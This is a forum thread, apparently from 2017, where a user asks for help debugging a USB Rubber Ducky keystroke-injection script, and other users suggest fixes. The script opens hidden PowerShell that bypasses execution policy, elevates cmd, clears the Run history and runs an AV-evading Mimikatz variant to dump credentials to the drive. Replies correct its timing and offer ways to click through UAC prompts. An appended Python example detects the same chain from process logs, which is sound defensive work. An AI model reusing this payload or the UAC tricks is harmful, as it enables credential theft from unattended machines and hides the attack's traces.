L07TB0Y, posted February 28, 2017

Here is my code:

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y
DELAY 1000
LEFTARROW
DELAY 300
ENTER
DELAY 500
STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d
DELAY 300
ENTER
DELAY 1000
STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';"
DELAY 300
ENTER

Issue 1: the UAC is not going away by either ALT Y or LEFTARROW and ENTER, but even after this, if I click OK manually it does not work.

FILES is the name of the Rubber Ducky. lb.ps1 is the customized mimi that does not get detected by AV, etc.

What am I doing wrong?
Guest, posted March 1, 2017 (edited)

Just from the look of it, the ENTER is at the wrong place.

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
ENTER
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
DELAY 1000
ALT Y

should be

DELAY 3000
ESC
DELAY 300
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 1000
ALT Y

Your version might have worked by accident if the last command the user typed in their Run box was CMD.

My advice to you: debug your own scripts by manually executing every line, step by step, and see where it goes wrong. Also, keep in mind that a script designed on one version of Windows might not work on another. The LEFTARROW and ENTER that follow have no function on my Windows 8.1 box. So when asking for help, tell us the OS you're using.

Edited March 1, 2017 by Guest
Guest, posted March 1, 2017

Regarding the UAC screen, try making an extremely easy script and see if any of these successfully bypasses the UAC message:

DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
ALT Y

or

DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
LEFTARROW
ENTER

or

DEFAULT_DELAY 3000
GUI r
STRING regedit
ENTER
TAB TAB TAB (number of tabs needed to select "yes")
ENTER
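From the defender's side, the chain debugged in this thread (a hidden, bypass-policy PowerShell spawning an elevated cmd, the RunMRU key wiped, a volume looked up by label, a script imported from that drive) leaves distinctive process-creation telemetry. The Python below is an added example, not code from the thread: it runs simple command-line rules over constructed Sysmon-style events and only raises the ones that trip several rules at once; the event fields, rule names, drive letter and file paths are assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon event ID 1 style), not real logs.
# Events 0-2 mirror the thread's payload after %FILES% expanded to E:; event 3 is benign admin use.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"""powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" """},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic volume get driveletter, label"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"""powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module E:\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File 'E:\WS01_creds.txt';" """},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# One regex per behaviour seen in the thread's script; both short and long PowerShell switch forms are accepted.
RULES = {
    "hidden_bypass_powershell": re.compile(r"powershell.*-W(indowStyle)?\s+Hidden.*-Exec(utionPolicy)?\s+Bypass", re.I),
    "elevation_via_start_process": re.compile(r"Start-Process\s+cmd\b.*-Verb\s+runAs", re.I),
    "runmru_wiped": re.compile(r"reg\s+delete\s+HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", re.I),
    "volume_enumeration": re.compile(r"wmic\s+volume\s+get\s+driveletter", re.I),
    "script_imported_from_drive": re.compile(r"Import-Module\s+[A-Z]:\\", re.I),
}


def matched_rules(event):
    """Names of the rules whose pattern appears in the event's command line, in RULES order."""
    cmd = event.get("CommandLine", "")
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def triage(events, threshold=2):
    """Return (index, rule names) for events tripping at least `threshold` rules.

    A single hit (for example a plain wmic volume query) is usually admin noise;
    several hits on one command line are what the thread's payload produces."""
    hits = []
    for i, ev in enumerate(events):
        names = matched_rules(ev)
        if len(names) >= threshold:
            hits.append((i, names))
    return hits


if __name__ == "__main__":
    for i, names in triage(SAMPLE_EVENTS):
        print(f"event {i}: {SAMPLE_EVENTS[i]['Image']} -> {', '.join(names)}")
```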